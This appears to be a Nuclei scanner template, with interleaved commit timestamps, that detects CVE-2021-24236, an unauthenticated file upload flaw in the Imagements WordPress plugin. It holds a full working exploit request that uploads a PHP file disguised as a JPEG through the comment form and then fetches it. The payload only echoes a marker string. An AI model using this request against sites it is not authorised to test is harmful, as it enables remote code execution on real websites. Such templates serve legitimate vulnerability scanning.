2022-07-30 10:13:30 +00:00
id : CVE-2021-24236
info :
2022-07-31 04:35:00 +00:00
name : WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload
2022-07-30 10:13:30 +00:00
author : pussycat0x
severity : critical
description : |
The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, however only checks for the Content-Type in the request to forbid dangerous files. This allows unauthenticated attackers to upload arbitrary files by using a valid image Content-Type along with a PHP filename and code, leading to RCE.
reference :
- https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
2022-07-31 04:35:00 +00:00
- https://wordpress.org/plugins/imagements/
2022-07-30 10:13:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24236
2022-07-30 22:42:08 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
2022-07-30 10:13:30 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2021-24236
cwe-id : CWE-434
2022-08-31 20:07:24 +00:00
tags : cve,rce,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin
2022-07-30 10:13:30 +00:00
variables :
php : "{{to_lower('{{randstr}}')}}.php"
post : "1"
requests :
- raw :
- |
POST /wp-comments-post.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="comment"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="author"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="email"
{{randstr}}@email.com
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="url"
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="checkbox"
yes
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="naam"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="image"; filename="{{php}}"
Content-Type : image/jpeg
<?php echo 'CVE-2021-24236'; ?>
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="submit"
Post Comment
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="comment_post_ID"
{{post}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="comment_parent"
0
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
- |
GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
Host : {{Hostname}}
req-condition : true
matchers :
- type : word
part : body_2
words :
2022-07-30 22:42:08 +00:00
- "CVE-2021-24236"